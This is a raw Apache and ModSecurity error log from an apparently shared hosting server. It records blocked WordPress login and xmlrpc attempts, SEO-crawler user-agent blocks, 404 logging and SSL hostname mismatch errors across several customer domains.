[Tue May 26 18:12:26.858108 2026] [security2:error] [pid 973439:tid 973581] [client 66.249.64.40:65206] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVMQBg9mKRpdEFs3Bw0gAAAAw"], referer: https://mosykay.com/prizes/132973501
[Tue May 26 18:12:27.462728 2026] [security2:error] [pid 973439:tid 973453] [remote 208.109.188.137:49232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVMwBg9mKRpdEFs3Bw-gAAEA0"]
[Tue May 26 18:12:28.062429 2026] [security2:error] [pid 973439:tid 973562] [remote 208.109.188.137:49232] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.188.109.208.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVNABg9mKRpdEFs3BxCgAAe3o"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:12:29.207223 2026] [security2:error] [pid 973439:tid 973652] [client 147.53.122.99:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWVNQBg9mKRpdEFs3BxKAAAAFM"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1225630&moderation-hash=1c91b5c556a43bd9bd7586e495750589
[Tue May 26 18:12:29.450536 2026] [security2:error] [pid 973439:tid 973611] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVNABg9mKRpdEFs3BxGQAAACo"]
[Tue May 26 18:12:29.648899 2026] [security2:error] [pid 973439:tid 973658] [client 43.173.176.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWVNQBg9mKRpdEFs3BxNAAAAFk"]
[Tue May 26 18:12:30.978172 2026] [security2:error] [pid 973439:tid 973644] [client 45.87.253.212:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWVNgBg9mKRpdEFs3BxVAAAAEs"], referer: https://www.anujtradingco.com/
[Tue May 26 18:12:31.524216 2026] [security2:error] [pid 973439:tid 973467] [remote 216.73.217.110:46761] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahWVNwBg9mKRpdEFs3BxcAAAEhs"]
[Tue May 26 18:12:31.845614 2026] [security2:error] [pid 973439:tid 973606] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVNwBg9mKRpdEFs3BxYgAAACU"]
[Tue May 26 18:12:32.155566 2026] [security2:error] [pid 973439:tid 973635] [client 45.87.253.212:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWVOABg9mKRpdEFs3BxhAAAAEI"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1440733&moderation-hash=4f591767ef977652ae1b9ddc45c28bf6
[Tue May 26 18:12:33.934172 2026] [security2:error] [pid 973439:tid 973685] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVOQBg9mKRpdEFs3BxngAAAHQ"]
[Tue May 26 18:12:34.530316 2026] [security2:error] [pid 973439:tid 973648] [client 82.76.238.33:50945] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVOgBg9mKRpdEFs3BxuQAAAE8"]
[Tue May 26 18:12:34.530888 2026] [security2:error] [pid 973439:tid 973648] [client 82.76.238.33:50945] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVOgBg9mKRpdEFs3BxuQAAAE8"]
[Tue May 26 18:12:36.499176 2026] [security2:error] [pid 973439:tid 973670] [client 109.248.252.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVOwBg9mKRpdEFs3Bx1gAAAGU"]
[Tue May 26 18:12:36.551085 2026] [security2:error] [pid 973439:tid 973693] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVOwBg9mKRpdEFs3Bx3AAAAHw"]
[Tue May 26 18:12:38.141943 2026] [security2:error] [pid 973439:tid 973486] [remote 216.73.217.169:31310] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "politica-global.com"] [uri "/index.php"] [unique_id "ahWVPQBg9mKRpdEFs3Bx_QAANi4"]
[Tue May 26 18:12:39.753145 2026] [security2:error] [pid 973439:tid 973569] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVPgBg9mKRpdEFs3ByJwAAAAA"]
[Tue May 26 18:12:40.852695 2026] [security2:error] [pid 973439:tid 973500] [remote 92.205.109.21:34040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVQABg9mKRpdEFs3BySwAAUzw"]
[Tue May 26 18:12:42.115976 2026] [security2:error] [pid 973439:tid 973592] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVQQBg9mKRpdEFs3ByZwAAABc"]
[Tue May 26 18:12:42.659746 2026] [security2:error] [pid 973439:tid 973581] [client 51.75.236.150:20090] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "plenitudotonal.com"] [uri "/robots.txt"] [unique_id "ahWVQgBg9mKRpdEFs3ByfwAAAAw"]
[Tue May 26 18:12:42.659859 2026] [security2:error] [pid 973439:tid 973581] [client 51.75.236.150:20090] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "plenitudotonal.com"] [uri "/robots.txt"] [unique_id "ahWVQgBg9mKRpdEFs3ByfwAAAAw"]
[Tue May 26 18:12:43.055157 2026] [security2:error] [pid 973439:tid 973498] [remote 84.247.181.196:44956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWVQgBg9mKRpdEFs3ByhwAATDo"]
[Tue May 26 18:12:44.002608 2026] [security2:error] [pid 973439:tid 973621] [client 54.39.210.18:18268] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "plenitudotonal.com"] [uri "/"] [unique_id "ahWVRABg9mKRpdEFs3ByoQAAADQ"]
[Tue May 26 18:12:44.002745 2026] [security2:error] [pid 973439:tid 973621] [client 54.39.210.18:18268] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "plenitudotonal.com"] [uri "/"] [unique_id "ahWVRABg9mKRpdEFs3ByoQAAADQ"]
[Tue May 26 18:12:44.527374 2026] [security2:error] [pid 973439:tid 973590] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVRABg9mKRpdEFs3BypAAAABU"]
[Tue May 26 18:12:45.266749 2026] [security2:error] [pid 973439:tid 973505] [remote 84.247.181.196:44956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.181.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWVRQBg9mKRpdEFs3ByxQAAW0E"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 18:12:45.608290 2026] [security2:error] [pid 973439:tid 973645] [client 82.76.238.33:51381] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVRQBg9mKRpdEFs3By0wAAAEw"]
[Tue May 26 18:12:45.608443 2026] [security2:error] [pid 973439:tid 973645] [client 82.76.238.33:51381] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVRQBg9mKRpdEFs3By0wAAAEw"]
[Tue May 26 18:12:46.263290 2026] [security2:error] [pid 973439:tid 973528] [remote 92.205.109.21:34040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 21.109.205.92.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVRgBg9mKRpdEFs3By5QAAblg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:12:47.314833 2026] [security2:error] [pid 973439:tid 973587] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVRgBg9mKRpdEFs3By8gAAABI"]
[Tue May 26 18:12:47.861994 2026] [security2:error] [pid 973439:tid 973600] [client 66.249.64.96:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWVRwBg9mKRpdEFs3BzEAAAAB8"]
[Tue May 26 18:12:47.862448 2026] [security2:error] [pid 973439:tid 973663] [client 66.249.64.96:60561] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWVRwBg9mKRpdEFs3BzCwAAAF4"]
[Tue May 26 18:12:48.805092 2026] [security2:error] [pid 973439:tid 973577] [client 114.119.145.154:24223] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "worldwidecourier.co.in"] [uri "/contact"] [unique_id "ahWVSABg9mKRpdEFs3BzPAAAAAg"], referer: https://worldwidecourier.co.in/contact
[Tue May 26 18:12:49.623974 2026] [security2:error] [pid 973439:tid 973534] [remote 38.95.35.74:38178] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.35.95.38.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVSQBg9mKRpdEFs3BzWgAATl4"]
[Tue May 26 18:12:49.936818 2026] [security2:error] [pid 973439:tid 973535] [remote 78.180.151.99:51992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.151.180.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVSQBg9mKRpdEFs3BzYgAAM18"]
[Tue May 26 18:12:49.938968 2026] [security2:error] [pid 973439:tid 973686] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVSQBg9mKRpdEFs3BzWQAAAHU"]
[Tue May 26 18:12:52.478038 2026] [security2:error] [pid 973439:tid 973669] [client 85.208.96.210:45914] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/4/"] [unique_id "ahWVTABg9mKRpdEFs3BzsgAAAGQ"]
[Tue May 26 18:12:52.478217 2026] [security2:error] [pid 973439:tid 973669] [client 85.208.96.210:45914] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/upcoming-events/page/4/"] [unique_id "ahWVTABg9mKRpdEFs3BzsgAAAGQ"]
[Tue May 26 18:12:52.577895 2026] [security2:error] [pid 973439:tid 973653] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVSwBg9mKRpdEFs3BzpQAAAFQ"]
[Tue May 26 18:12:53.224640 2026] [security2:error] [pid 973439:tid 973546] [remote 45.131.138.154:53299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 154.138.131.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVTQBg9mKRpdEFs3BztgAAKGo"]
[Tue May 26 18:12:53.333600 2026] [security2:error] [pid 973439:tid 973551] [remote 57.141.2.37:40411] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 37.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWVTQBg9mKRpdEFs3BzxQAAam8"]
[Tue May 26 18:12:53.757240 2026] [security2:error] [pid 973439:tid 973552] [remote 45.131.138.154:53299] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 154.138.131.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVTQBg9mKRpdEFs3Bz2AAAFHA"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:12:53.954030 2026] [security2:error] [pid 973439:tid 973549] [remote 78.180.151.99:51992] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 99.151.180.78.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVTQBg9mKRpdEFs3Bz3AAAe20"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:12:53.959272 2026] [ssl:error] [pid 973439:tid 973492] [remote 41.76.86.74:51438] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:12:53.959372 2026] [ssl:error] [pid 973439:tid 973555] [remote 41.76.86.74:51438] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:12:53.959400 2026] [ssl:error] [pid 973439:tid 973443] [remote 41.76.86.74:51438] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:12:53.959531 2026] [ssl:error] [pid 973439:tid 973559] [remote 41.76.86.74:51438] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:12:53.959559 2026] [ssl:error] [pid 973439:tid 973441] [remote 41.76.86.74:51438] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:12:53.959847 2026] [ssl:error] [pid 973439:tid 973444] [remote 41.76.86.74:51438] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:12:53.960027 2026] [ssl:error] [pid 973439:tid 973555] [remote 41.76.86.74:51438] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:12:54.933836 2026] [security2:error] [pid 973439:tid 973666] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVTgBg9mKRpdEFs3Bz-gAAAGE"]
[Tue May 26 18:12:55.047536 2026] [ssl:error] [pid 973439:tid 973455] [remote 41.76.86.74:51438] AH02032: Hostname www.lagoslawntennisclub1895.com provided via SNI and hostname api.lagoslawntennisclub1895.com provided via HTTP have no compatible SSL setup for policy 'secure', referer: https://www.lagoslawntennisclub1895.com/
[Tue May 26 18:12:56.928046 2026] [security2:error] [pid 973439:tid 973613] [client 82.76.238.33:51824] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.238.76.82.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVUABg9mKRpdEFs3B0aAAAACw"]
[Tue May 26 18:12:56.928245 2026] [security2:error] [pid 973439:tid 973613] [client 82.76.238.33:51824] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "bosscoirs.com"] [uri "/xmlrpc.php"] [unique_id "ahWVUABg9mKRpdEFs3B0aAAAACw"]
[Tue May 26 18:12:57.108120 2026] [security2:error] [pid 973439:tid 973484] [remote 103.82.21.169:54710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 169.21.82.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVUABg9mKRpdEFs3B0bAAAWiw"]
[Tue May 26 18:12:57.474741 2026] [security2:error] [pid 973439:tid 973627] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVUQBg9mKRpdEFs3B0cQAAADo"]
[Tue May 26 18:12:57.487449 2026] [security2:error] [pid 973439:tid 973500] [remote 109.228.50.118:53114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.50.228.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWVUQBg9mKRpdEFs3B0fQAATjw"]
[Tue May 26 18:12:58.142169 2026] [security2:error] [pid 973439:tid 973489] [remote 109.228.50.118:53114] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.50.228.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahWVUgBg9mKRpdEFs3B0lgAAKzE"], referer: https://rohiniventures.com/wp-login.php
[Tue May 26 18:12:58.760435 2026] [security2:error] [pid 973439:tid 973498] [remote 51.91.98.45:42576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 45.98.91.51.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWVUgBg9mKRpdEFs3B0pAAAOzo"]
[Tue May 26 18:12:59.916547 2026] [security2:error] [pid 973439:tid 973638] [client 185.93.89.10:59572] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "302"] [hostname "md-74.webhostbox.net"] [uri "/index.cgi"] [unique_id "ahWVUwBg9mKRpdEFs3B0zwAAAEU"]
[Tue May 26 18:13:00.407059 2026] [security2:error] [pid 973439:tid 973634] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVUwBg9mKRpdEFs3B00wAAAEE"]
[Tue May 26 18:13:01.026301 2026] [security2:error] [pid 973439:tid 973508] [remote 103.11.102.106:52814] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWVVABg9mKRpdEFs3B04gAAW0Q"]
[Tue May 26 18:13:02.256134 2026] [security2:error] [pid 973439:tid 973587] [client 172.225.77.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahWVVgBg9mKRpdEFs3B1GAAAABI"]
[Tue May 26 18:13:02.849637 2026] [security2:error] [pid 973439:tid 973571] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVVgBg9mKRpdEFs3B1JQAAAAI"]
[Tue May 26 18:13:05.224913 2026] [security2:error] [pid 973439:tid 973655] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWVWABg9mKRpdEFs3B1ewAAAFY"]
